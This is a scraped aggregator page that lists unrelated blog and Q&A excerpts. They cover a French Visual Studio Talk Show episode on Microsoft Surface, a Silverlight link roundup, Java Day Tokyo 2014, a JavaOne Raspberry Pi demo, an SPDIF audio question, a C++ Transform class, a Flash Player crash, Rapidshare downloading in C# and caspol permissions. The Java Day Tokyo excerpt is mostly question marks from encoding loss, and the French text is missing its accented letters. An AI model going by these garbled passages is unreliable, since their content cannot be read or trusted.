  • Visual Studio Talk Show #117 is now online - Microsoft Surface (French)

    http://www.visualstudiotalkshow.com Simon Ferquel et Thomas Lebrun: Microsoft Surface Nous discutons avec Simon Ferquel et Thomas Lebrun du systme informatique "Surface". Surface se prsente l'utilisateur comme une table dont le dessus est constitu d'une surface dot dun affichage tactile "multitouch" qui permet de manipuler un contenu informatique l'aide d'un cran tactile. Thomas Lebrun est architecte et dveloppeur chez Access IT Paris. Il est particulirement intress...Did you know that DotNetSlackers also publishes .net articles written by top known .net Authors? We already have over 80 articles in several categories including Silverlight. Take a look: here.

    Read the article

  • Silverlight Cream for March 07, 2011 -- #1055

    - by Dave Campbell
    In this Issue: Max Paulousky, Chris Rouw, David Anson, Jesse Liberty, Shawn Wildermuth, Simon Guindon, and Dhananjay Kumar. Above the Fold: Silverlight: "Faster Databinding in WPF and Silverlight using OptimizedObservableCollection" Simon Guindon WP7: "Phoney Tools Updated (WP7 Open Source Library)" Shawn Wildermuth From SilverlightCream.com: Problems With Sharing Windows Phone 7 Applications Within A Large Group Of Beta Testers Max Paulousky has a post up discussing the issues surrounding beta testing a WP7 app with a large group of testers... and how to pull it all off. WP7 Insights #1: Consuming REST APIs within a WP7 app Chris Rouw is beginning a WP7 series based on his recent experience of getting a client's app into the marketplace. This first in his series is on consuming REST APIs ... lots of good code and explanations. Improving Windows Phone 7 application performance is even easier with these LowProfileImageLoader and DeferredLoadListBox updates David Anson has an update to his LowProfileImageLoader and DeferredLoadListBox after issues brought up by readers... so we all win with the great feedback from alert devs. When Isolated Storage Isn’t Enough Jesse Liberty started looking at Jeremy Likness' Sterling with this post in the WP7 From Scratch series. He starts with downloading it from CodePlex ... great way to get into Sterling if you haven't already. Phoney Tools Updated (WP7 Open Source Library) Shawn Wildermuth has the latest drop of his Phoney Tools up... this is the last Alpha. I've added a tag for it as well. He's fixed some things, added others... check out the post and go grab the code. Faster Databinding in WPF and Silverlight using OptimizedObservableCollection Simon Guindon is a blogger I've not been following, but this post on an OptimizedObservableCollection caught my eye. He added an AddRange() to the ObservableCollection to get a speed enhancement when adding items... and a pretty good speed enhancement it is. Reading files asynchronously using WebClient class in Silverlight Dhananjay Kumar is another prolific blogger that I've not been following, so we'll start with his latest... a step-by-step guide to reading an XML file asynchronously. Stay in the 'Light! Twitter SilverlightNews | Twitter WynApse | WynApse.com | Tagged Posts | SilverlightCream Join me @ SilverlightCream | Phoenix Silverlight User Group Technorati Tags: Silverlight    Silverlight 3    Silverlight 4    Windows Phone MIX10

    Read the article

  • Java Day Tokyo 2014 ????????

    - by OTN-J Master
    5?22?(?)???????????????Java Day Tokyo 2014?????????????????Create the Future with Java??????Java?????????????????????Java???????????????????????????????????Java 8??Java 8????????(3?)??????????????????????????????????????? ¦ IoT?????Java-???????????????????????????Java?????????????????????????????? (????Nandini Ramani?Cameron Purdy?Simon Ritter)Nandini Ramani??Java SE?Java ME??Cameron Purdy?Java EE??Simon Ritter?Java????????????????????????????????????????????Java SE 8?????????????Oracle Java for MIPS(32???/64????)????????????????????????OTN?????????????????????????Java????????????????????????¦??????????????????IoT????????3????????????????????JavaOne 2013???????????????????????????????????????????????????????·Lego Mindstorms?????Stephen Chin(Java Technology Ambassador)???????????Lego Duke Segway????Lego Mindstorms??????????????????Duke???2????????????????????????????????????????????????????????????????????????????????????????????????????????? ??????????Duke Segway????????????????Duke?????????????????????????????????????????????? ·DukePadRaspberry Pi ??????Java SE Embedded?????????????????????????????????????JavaFX???????????????????????????????????????????????????????????(??????????????)????????????????????????????????????????????????????????????????????????? ·Chess RobotDukePad????????????????????????????????????DukePad??????????????????????????????????????????????????????????????¦Java???????2015??Java????20???????(?????????!)???Java?????????????????????????????????????????Java???????????????????????????????????????????????????????????????????????????????¦Java Magazine ????Java????????????????????????????????????????????????????????????Java 8 ?????????????????IoT???????????????????????????????????????????????????????????????????????????????????????????????Java????????????????????????????????????????????????????????????????????????Java Magazine????????????????????????????????????Java Magazine ????????OTN?????????Java????????????PDF??????eBook???????????????????? ??????????Facebook???:Java Day TokyoJava Day Tokyo 2013

    Read the article

  • JavaOne 2012 demo of Java SE Embedded on Raspberry Pi

    - by hinkmond
    Here's the Inquirer's article about our Java SE Embedded demos at JavaOne 2012 this year. Simon Ritter had a fun presentation showing the cool demo on the Raspberry Pi at his talk. See: Demo Java SE Embedded on Raspberry Pi Here's a quote: Oracle demonstrated Java SE for embedded devices running on the Raspberry Pi bare bones computer at the Java One show on Wednesday, with the aim of encouraging developers to try it out for themselves to create reference libraries for the target school children audience. I had the presentation after Simon and saw the size crowd he had. They were laughing and clapping at the demo and having a good ol' time. Good to see the interest in Java SE Embedded, even if it is for a "toy" device like the Raspberry Pi. Hinkmond

    Read the article

  • Optical SPDIF audio from motherboard not working with receiver

    - by simon b
    Hi, I hope someone can help; I can't get my SPDIF optical out working through my receiver and all the responses I can see on the web assume you have a sound card, while I settled for the (seemingly high end) sound on my motherboard (Asus P7P55D-E PRO), which appears to limit some of my options. My set-up is a "new out of the box" one and is: *Windows 7 PC (using PowerDVD10 for DVDs/Blurays and Windows media player for music) *Asus P7P55D-E PRO motherboard - has 8-channel audio TRS jacks and SPDIF optical and coaxial out *An old Yamaha receiver, whose only multi-channel input options are optical in and 6 channel RCA in. However, it still can handle DTS and DD *Boston Acoustic Soundware XS 5.1 speakers I've currently got the SPDIF optical out from the motherboard connected to the in on my receiver, have SPDIF enabled in the sound menu and the light is glowing red down the fibre. But I'm getting no sound at all. What I want is to be able to play DVDs/BluRays in 5.1 but also to be able to play music in multi-channel mode (even though I know this will be "fake" multichannel; it's more about where I sit in the room and my requirement to use the sub because the Boston is a satellite/sub set-up) My questions are: *Will optical work at all for multi-channel? THe latest posts I can see suggest it does but some people seem to say optical only outputs stereo. Whom to believe? *Even if it does work, I've read that I have to disable AC-3 decoding, or make various other changes, which don't seem to be possible without the menu options that a sound-card brings. Is the motherboard-only option just too inflexible? *Although my SPDIF device is enabled in the sound menu, it insists under "Jack information" that it is a "rear panel RCA jack", when of course it is not (both TOSLINK and rCA jacks do exist). Has the PC just forgotten that it has an optical? *I think I could relatively easily connect the 8-channel 3.5mm TRS jacks to my receiver 6-ch input jacks by way of TRS/RCA cables, but would that not stop me from being able to play music from media-player in multi-channel mode, as I'm not sure the motherboard can cope *Or do I need to bite the bullet and buy a sound-card? And if so, how can I be sure the one I get doesn't have the same problem? Any thoughts gratefully received, Cheers, simon

    Read the article

  • Do I need to store a generic rotation point/radius for rotating around a point other than the origin for object transforms?

    - by Casey
    I'm having trouble implementing a non-origin point rotation. I have a class Transform that stores each component separately in three 3D vectors for position, scale, and rotation. This is fine for local rotations based on the center of the object. The issue is how do I determine/concatenate non-origin rotations in addition to origin rotations. Normally this would be achieved as a Transform-Rotate-Transform for the center rotation followed by a Transform-Rotate-Transform for the non-origin point. The problem is because I am storing the individual components, the final Transform matrix is not calculated until needed by using the individual components to fill an appropriate Matrix. (See GetLocalTransform()) Do I need to store an additional rotation (and radius) for world rotations as well or is there a method of implementation that works while only using the single rotation value? Transform.h #ifndef A2DE_CTRANSFORM_H #define A2DE_CTRANSFORM_H #include "../a2de_vals.h" #include "CMatrix4x4.h" #include "CVector3D.h" #include <vector> A2DE_BEGIN class Transform { public: Transform(); Transform(Transform* parent); Transform(const Transform& other); Transform& operator=(const Transform& rhs); virtual ~Transform(); void SetParent(Transform* parent); void AddChild(Transform* child); void RemoveChild(Transform* child); Transform* FirstChild(); Transform* LastChild(); Transform* NextChild(); Transform* PreviousChild(); Transform* GetChild(std::size_t index); std::size_t GetChildCount() const; std::size_t GetChildCount(); void SetPosition(const a2de::Vector3D& position); const a2de::Vector3D& GetPosition() const; a2de::Vector3D& GetPosition(); void SetRotation(const a2de::Vector3D& rotation); const a2de::Vector3D& GetRotation() const; a2de::Vector3D& GetRotation(); void SetScale(const a2de::Vector3D& scale); const a2de::Vector3D& GetScale() const; a2de::Vector3D& GetScale(); a2de::Matrix4x4 GetLocalTransform() const; a2de::Matrix4x4 GetLocalTransform(); protected: private: a2de::Vector3D _position; a2de::Vector3D _scale; a2de::Vector3D _rotation; std::size_t _curChildIndex; Transform* _parent; std::vector<Transform*> _children; }; A2DE_END #endif Transform.cpp #include "CTransform.h" #include "CVector2D.h" #include "CVector4D.h" A2DE_BEGIN Transform::Transform() : _position(), _scale(1.0, 1.0), _rotation(), _curChildIndex(0), _parent(nullptr), _children() { /* DO NOTHING */ } Transform::Transform(Transform* parent) : _position(), _scale(1.0, 1.0), _rotation(), _curChildIndex(0), _parent(parent), _children() { /* DO NOTHING */ } Transform::Transform(const Transform& other) : _position(other._position), _scale(other._scale), _rotation(other._rotation), _curChildIndex(0), _parent(other._parent), _children(other._children) { /* DO NOTHING */ } Transform& Transform::operator=(const Transform& rhs) { if(this == &rhs) return *this; this->_position = rhs._position; this->_scale = rhs._scale; this->_rotation = rhs._rotation; this->_curChildIndex = 0; this->_parent = rhs._parent; this->_children = rhs._children; return *this; } Transform::~Transform() { _children.clear(); _parent = nullptr; } void Transform::SetParent(Transform* parent) { _parent = parent; } void Transform::AddChild(Transform* child) { if(child == nullptr) return; _children.push_back(child); } void Transform::RemoveChild(Transform* child) { if(_children.empty()) return; _children.erase(std::remove(_children.begin(), _children.end(), child), _children.end()); } Transform* Transform::FirstChild() { if(_children.empty()) return nullptr; return *(_children.begin()); } Transform* Transform::LastChild() { if(_children.empty()) return nullptr; return *(_children.end()); } Transform* Transform::NextChild() { if(_children.empty()) return nullptr; std::size_t s(_children.size()); if(_curChildIndex >= s) { _curChildIndex = s; return nullptr; } return _children[_curChildIndex++]; } Transform* Transform::PreviousChild() { if(_children.empty()) return nullptr; if(_curChildIndex == 0) { return nullptr; } return _children[_curChildIndex--]; } Transform* Transform::GetChild(std::size_t index) { if(_children.empty()) return nullptr; if(index > _children.size()) return nullptr; return _children[index]; } std::size_t Transform::GetChildCount() const { if(_children.empty()) return 0; return _children.size(); } std::size_t Transform::GetChildCount() { return static_cast<const Transform&>(*this).GetChildCount(); } void Transform::SetPosition(const a2de::Vector3D& position) { _position = position; } const a2de::Vector3D& Transform::GetPosition() const { return _position; } a2de::Vector3D& Transform::GetPosition() { return const_cast<a2de::Vector3D&>(static_cast<const Transform&>(*this).GetPosition()); } void Transform::SetRotation(const a2de::Vector3D& rotation) { _rotation = rotation; } const a2de::Vector3D& Transform::GetRotation() const { return _rotation; } a2de::Vector3D& Transform::GetRotation() { return const_cast<a2de::Vector3D&>(static_cast<const Transform&>(*this).GetRotation()); } void Transform::SetScale(const a2de::Vector3D& scale) { _scale = scale; } const a2de::Vector3D& Transform::GetScale() const { return _scale; } a2de::Vector3D& Transform::GetScale() { return const_cast<a2de::Vector3D&>(static_cast<const Transform&>(*this).GetScale()); } a2de::Matrix4x4 Transform::GetLocalTransform() const { Matrix4x4 p((_parent ? _parent->GetLocalTransform() : a2de::Matrix4x4::GetIdentity())); Matrix4x4 t(a2de::Matrix4x4::GetTranslationMatrix(_position)); Matrix4x4 r(a2de::Matrix4x4::GetRotationMatrix(_rotation)); Matrix4x4 s(a2de::Matrix4x4::GetScaleMatrix(_scale)); return (p * t * r * s); } a2de::Matrix4x4 Transform::GetLocalTransform() { return static_cast<const Transform&>(*this).GetLocalTransform(); } A2DE_END

    Read the article

  • Flash Player 10.1 crash on shared object access

    - by Simon
    Hi all, since updating my Flash Player plugin from 10 to 10.1, I'm seeing a weird crash when accessing shared objects. Flex Builder's debugger pops up and prints a stack trace like this: undefined at flash.net::SharedObject$/getLocal() at my.code::MyClass$/load()[/my/path/to/my/MyClass.as:27] (...) This happens when calling SharedObject.getLocal("someString") for the second time for the same string, though it doesn't always crash. When using another browser on the same machine (not configured as the preferred debugging browser in Flex Builder), Flash Player remains silent. The code is wrapped in a try/catch(Error) block which does not catch this error. I'm using Flex SDK 3.5 and Flex Builder 3 on Mac OS X 10.6.3. Has anyone else seen this? Thanks, Simon

    Read the article

  • C#/.Net Download file from premium rapidshare account

    - by Simon
    Hello, how can I log to premium rapidshare account from my source? I tryed this but it is not working: string authInfo = "name" + ":" + "pass"; authInfo = Convert.ToBase64String(Encoding.Default.GetBytes(authInfo)); client.Headers["Authorization"] = "Basic " + authInfo; client.DownloadFile("url", "C:\\Temp\\aaaa.file"); OR WebClient client = new WebClient(); client.Credentials = new NetworkCredential("name", "pass"); client.DownloadFile("url", "C:\\Temp\\aaaa.file"); Is there any simple way how download the file directly from rapidshare premium? Thank you a lot! Regards, simon

    Read the article

  • Caspol, VMs, Mapped Drives, VS2010

    - by Simon Woods
    Hi I have a VM (Win7 32 bit) with VS2010 installed. I have a drive mapped into it from the host machine (VM 64 bit), when I have some of my VS2010 projects and to where I am building them. One of my projects is looking to load an assembly. If I copy that assembly to a local drive, the program ruins fine. If I leave it on the mapped drive, then I get an error Exception is: FileLoadException - Could not load file or assembly 'file:///Z:\BusinessTier\bin\Debug\BusinessTier.dll I am unsure whether or not I need to run Caspol. There is another post on SO which pointed me to a post which indicated that VS2008 SP1+ removed the need for caspol wrt network drives, but I wondered if I still needed to because I am in a VM. I have tried running the following on the host machine in an attempt to give permissions to VS inside the VM, but to no avail C:\Windows\Microsoft.NET\Framework\v4.0.30128>caspol -m -ag 1.2 -url file://g:\* FullTrust where g:* is the drive being mapped into the VM (as drive z:) What am I missing (apart from understanding!) Thx Simon

    Read the article

< Previous Page | 49 50 51 52 53 54 55 56 57 58 59 60  | Next Page >